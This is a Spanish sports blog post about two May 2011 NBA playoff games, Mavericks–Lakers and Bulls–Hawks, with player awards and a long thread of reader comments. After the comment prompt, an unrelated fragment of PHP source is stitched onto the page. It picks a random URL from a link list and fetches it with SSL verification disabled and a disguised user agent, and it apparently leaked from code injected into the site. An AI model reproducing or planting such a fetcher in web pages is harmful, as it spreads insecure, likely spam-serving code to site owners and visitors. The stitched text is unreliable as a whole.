Playoffs (04/04/2011): Cambio de papeles

05 de May de 2011 por Viva_Dirk

Tradicionalmente los Mavs siempre han sido un equipo en el que, llegados los playoffs, algo fallaba. En cambio, por muy malas rachas que hubieran padecido los Lakers en la liga regular siempre las achacábamos una indolencia innata que desaparecía llegado el momento. El partido de anoche echó por tierra todos esos mitos. Dirk Nowitzki realizó uno de sus habituales excelentes partidos y esta vez vio como prácticamente todos sus compañero le seguian el ritmo: Shawn Marion fue el de antaño con 14-9, JJ Barea resultó decisivo en los 17 minutos que disputó, Chandler&Haywood sumaron 11 puntos y 15 rebotes y Rick Carlisle supo alargar el tiempo en pista del jugador acertado. Por el contrario, los Lakers fueron una sombra de si mismos. Un espeluznante 2 de 20 en triples marcó el ataque amarillo en el que sólo Bynum estuvo brillante. Kobe no fue determinante y Gasol vio como nuevamente Nowitzki le pasaba por encima. Fue una de las pocas veces en las que hemos visto a Phil Jackson sin ningun argumento táctico o de pura motivación. Están acostumbrados a la épica por aquellos lares. Ahora están obligados a recurrir a ella.

En Chicago, los Bulls aplastaron en el rebote a los Hawks con casi 20 capturas más que dieron a los locales el control del partido. Derrick Rose celebró su MVP con un partido impreciso y alocado de 8 pérdidas y un 10 de 27 impropio de él, conseguido a base de lanzar triples cuando estos no son su mayor virtud. Por suerte, encontró la mejor versión de Joakim Noah al lado, contó también con un buen partido de Luol Deng y un Carlos Boozer al que aún se le espera pero que maquilló su actuación con 11 rebotes. Por los Hawks sólo la pareja de guards Teague&Johnson vio aro mientras Al Horford peleaba prácticamente solo bajo los aros.  Dejando al margen a sus 2 máximos anotadores, los Hawks sólo fueron capaces de anotar 12 canastas de 48 intentos. Esta falta de acierto, sumada al dominio del rebote de los Bulls, desenvocó en partido cómodo para los de Michigan, que deben estar pensando en como mantener a Jamal Crawford tan contenido como ayer.

PREMIOS

MVP: Joakim Noah fue el mejor de los suyos con 19 puntos, 14 rebotes (7 de ellos ofensivos), 3 tapones, 6 de 8 en tiros de campo y 7 de 8 en tiros libres. Tuvo que hacer el trabajo por el que pagan a otro, como pasa en demasiadas empresas. Dirk Nowitzki anotó 24 puntos y capturó 7 rebotes con un 9 de 16 en tiros, 2 de 3 en triples y 4 de 5 en tiros libres. Lo que no se termina de creer es que eso le valga para salir con un 0-2 del Staples.

Sorpresa: En 17 minutos de juego JJ Barea anotó 12 puntos y repartió 4 asistencias, y lo que es más importante, dominó el juego durante cada minuto que estuvo en pista dejando patente que la calidad no entiende de tamaño.

Decepción: Todos coincidimos en su momento que los fichajes de Steve Blake y Matt Barnes le daban un plus de calidad a la plantilla amarilla. Pues bien, anoche ese plus fue de 0 puntos, 3 pérdidas y un 0 de 7 en tiros en los 30 minutos que disputaron entre ambos. Toda una hazaña.

Esfuerzo en vano: Andrew Bynum sigue demostrando que sano es un pívot como hay pocos. Tiró del carro de los Lakers con 18 puntos y 13 rebotes (7 de ellos ofensivos) con un 8 de 11 en tiros. Joe Johnson y Jeff Teague sumaron 37 puntos, 7 rebotes y 8 robos pero salieron con una derrota del United Center.

Imágenes | AP Photos / Getty Images

Comenta

24 comentarios a esta entrada

  1. Rafa dice:
    #1

    Esto pinta negro para Lakers…

      Citar

  2. MagicJohnson32 dice:
    #2

    No vi el Lakers-Mavs de anoche pero por lo leído y por cómo llegan los LAL, me puedo hacer una idea de lo ocurrido. El equipo, después de aquella racha tan buena en la que pareció invencible, está como hundido físicamente (digo ‘como’ porque no sé si realmente es ése el problema).

    Obviamente jugando así no van a pasar pero una victoria en el 3º pondría la eliminatoria en una situación no demasiado negativa para Lakers. Con un poco de suerte, Stu Jackson sancionará a Artest, jeje.

      Citar

  3. Txusma dice:
    #3

    Que Kobe no haya pillado ni un rebote no os parece extraño? Da la impresión de estar muy quemado…

    Y q los Lakers tengan alguna posibilidad depende exclusivamente de ganar el tercero, claro.

      Citar

  4. Tobal dice:
    #4

    Muy bien por Dallas,que está realizando la proeza de ganarles a los Lakers,los dos primeros partidos en casa,el tercer encuentro en cancha de Dallas será clave,si ganan los de Nowitzki,la eliminatoria no se les debería escapar

      Citar

  5. Sr. Lagarto dice:
    #5

    uy, uy, uy…qué mala pinta tiene ésto.

      Citar

  6. Txusma dice:
    #6

    Y si gana Lakers el tercero también sería un delito que se les escapara la eliminatoria. Nowitzki no podría quitarse el san benito de perdedor en la vida creo yo. Entre la final aquella con Miami y esto sería para esconderse bajo tierra. Vaya mal de altura, Daimiel!!

      Citar

  7. HeiNeKeN dice:
    #7

    Hare un comentario estupido pero… los Mavs son los Mavs, especialistas en cagarla con todo a favor y los Lakers son los Lakers, especialistas en cerrar bocas cuando todos les critican.

    Para mi sigue muy abierta la eliminatoria.

    PD: Rose que deje de tirar triples, lleva 11 de 52 en 7 partidos… 21% de acierto…

      Citar

  8. Viva_Dirk dice:
    #8

    Bueno Txus, habrá que ver que pasa para ponerle algun tipo de san benito a Nowitzki.

      Citar

  9. Rompe dice:
    #9

    Qué sería de estos Mavs con Butler…

      Citar

  10. Txusma dice:
    #10

    Habrá que ver qué pasa o que ha pasado? De momento la final frente Miami y el “We believe” de los Warriors no dejan a los Mavs en buen lugar. De hecho, son sospechosos habituales, como opina Heineken, por ejemplo. Yo lo siento, pero si los Mavs no eliminan a los Lakers saliendo 0-2 del Staples, es para q Dallas pase a la historia y no precisamente por algo positivo.

      Citar

  11. Viva_Dirk dice:
    #11

    Mira, si Nowitzki hace 35-10 con 60% en tiros en los próximos 4 partidos y los Mavs pierden no puedes ponerle ningun san benito. Hay que fijarse en como pasan las cosas, no solo en el resultado.

      Citar

  12. Hynreck dice:
    #12

    Viva, precisamente “Colgar el sambenito” expresa el acto de echar sobre alguien una culpa que no merece. Así que si hace un 35-10 con 60% en tiros sí, se le colgará el sambenito de perdedor.

      Citar

  13. Txusma dice:
    #13

    Como dice Hynreck, yo no digo que se lo mereciera pero que se lo van a decir, seguro. Además, aunque haga 35-10 con un 60% la gente te puede argumentar que no era eso lo que necesitaba su equipo y que como líder ha fallado en los momentos importantes. Tu puedes no estar de acuerdo pero ya sabes lo que discutimos sobre Kobe cuando se casca 30 puntos y los Lakers pierden.

      Citar

  14. Denise dice:
    #14

    Yo no doy por muerto a Lakers todavia.

      Citar

  15. GreenPride dice:
    #15

    ¡¡¡¡¡ Arde L.A!!!! Los dos finalestas del año pasado contra las cuerdas. Pero vayamos por partes.
    En Chicago sensaciones contrapuestas. Rose está jugando bastante mal en mi opinión, muy ofuscado en un tiro exterior que le ha funcionado durante la regular pero que ahora que calienta el sol le está dejando en mal lugar, no sé si su tobillo tocado tendrá algo que ver en esto. Además lo pasa fatal en defensa con Teague que le está haciendo un descosido. A pesar de eso, con la clase que tiene es el mejor de unos Bulls que no andan nada finos. Ni los tiradores ven mucho aro, ni Boozer está en forma. Con todo y con esto los Hawks desperdiciaron una gran ocasión de poner el 0-2 debido a que los Bulls se los comieron bajo los aros con mención de honor para Noah. Horrendo partido en ataque de Josh Smith (aunque se hartó de ponerle gorros en defensa a Boozer) y muy controlado Crawford, a los Hawks les faltó hambre y un poco de acierto para tomar clara ventaja en la eliminatoria pero si los Bulls no mejoran bastante los Hawks tienen una gran oportunidad de llegar a unas impensables finales de conferencia en el Este.
    Y ahora la traca más gorda. Los Lakers caen por segunda vez consecutiva en casa ante los Mavs y se ponen 0-2. Y siento decir esto, Pau es un grandísimo jugador, la clave de los Lakers en sus títulos y ahora la clave en sus miserias. Pau está haciendo unos playoffs muy por debajo de su nivel y en esta serie Dirk le está machacando. Normalmente Pau le haría daño por dentro y Dirk le haría sufrir con sus tiros pero Pau en ataque está regular y en defensa Dirk se las mete de todos los colores (como al resto de sus defensores eso es verdad). Esto unido a un Bryant que parece algo tocado y a que los tiradores no dan una de fuera hacen que los Lakers estén al borde de la eliminación. Los Mavs abren mucho la cancha con Terry y Stojakovic y eso deja grandes espacios para Kidd y Barea que como siempre con los Lakers dejan muy atrás a Fisher o Blake. La eliminatoria no está decidida sobre todo porque son los Mavericks, expertos en pegársela pero lo tienen todo a favor. En el próximo partido los Lakers lucharán por su supervivencia y los Mavs para prácticamente matar la serie. Veremos si los Mavs siguen con su fama de equipo que se disuelve desde aquellas finales ante los Heat y si los de LA son capaces de levantarse aunque en ambos casos parece que la historia está cambiando

      Citar

  16. gabrielj dice:
    #16

    los Hawks tienen muchos problemas para anotar con fluidez y ya lo vienen arrastrando desde la serie anterior a pesar de dar la “sorpresa” contra los Magic, creo que en ocasiones abusan demasiado del 1vs1 sin tener jugadores preparados para ello

      Citar

  17. Javijaen dice:
    #17

    Anda que todas nuestras predicciones van por buen camino!!!! Creo que nadie apostó por Mavs, así que LAL tendrá que espabilarse un poquito más… Ahora todo fuera de casa, si los de Dallas se ponen 3-0 es casi imposible de remontar, no sé si se habrá dado ni siquiera.

      Citar

  18. Javijaen dice:
    #18

    Lease con ironía lo de “las predicciones” del comentario anterior…

      Citar

  19. Viva_Dirk dice:
    #19

    Si que se han remotado eliminatorias con 3-0, a Lakers recientemente se lo hicieron los Suns de Nash&D’Antoni.

      Citar

  20. Txusma dice:
    #20

    El año 2006? Los Suns remontaron un 1-3. Ganaron el primer partido en casa. Creo q sólo en 4 ocasiones en toda la historia se ha levantado un 0-2 en contra.

      Citar

  21. GreenPride dice:
    #21

    Viva_Dirk, en la historia de la NBA nunca se ha remontado un 3-0 en contra. Los Lakers remontaron a los Suns un 3-1 en contra hace unos años no un 3-0. En cuanto a un 0-2 en contra con los 2 primeros partidos perdidos en casa sólo se ha remontado en 3 o 4 ocasiones y de la última hace muchos años. Los Lakers tienen un gran hollo que cabar y sólo una vuelta del mejor Gasol y que los tiradores exteriores (Blake, Fisher, Brown) empiecen a meter alguna puede darle la vuelta a la situación. También necesitarán mejorar mucho en su defensa del Pick&Roll sobre Kidd y Barea e intentar que Nowitzki no las meta cuando les dé la gana. Pueden hacerlo pues calidad la tienen pero la verdad es que parece muy difícil. En cuanto a los Mavs estoy de acuerdo en que si pierden esta eliminatoria nadie les podrá quitar ya a estos jugadores el estigma de perdedores. Probablemente es injusto con tío como Dirk que es buenísimo y que suele ser de los mejores en los finales de partido pero si después de lo de las finales con los Heat y el “We Believe” caen esta vez será imposible quitarles el sambenito.

      Citar

  22. max dice:
    #22

    El recientemente nombrado Mejor Ciudadano del Año en la NBA, Ron Artest, suspendido para el tercer partido por darle un bofetón a Barea. Igual con Odom en el cinco inicial cambian las cosas para Lakers.

      Citar

  23. miquel dice:
    #23

    Aunqe pinte mal para los lakers supongo qe la eliminatoria acabara 4-2 o 4-3 porqe en el american airlines kobe ara un partido de 35 puntos para arriba i si gasol vuelve a ser gasol no se qe pasara,yo no doy por muertos a los lakers i eso que no soy simpatizante suyo

      Citar

  24. Denise dice:
    #24

    @max: yo creo que en el 5 inicial en lugar de Artest entrará Matt Barnes y no Odom. Y creo que Barnes puede hacer su trabajo hasta mejor que Artest. Esta noche ganan los Lakers seguro. Creo que a los Mavs les va a entrar vertigo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>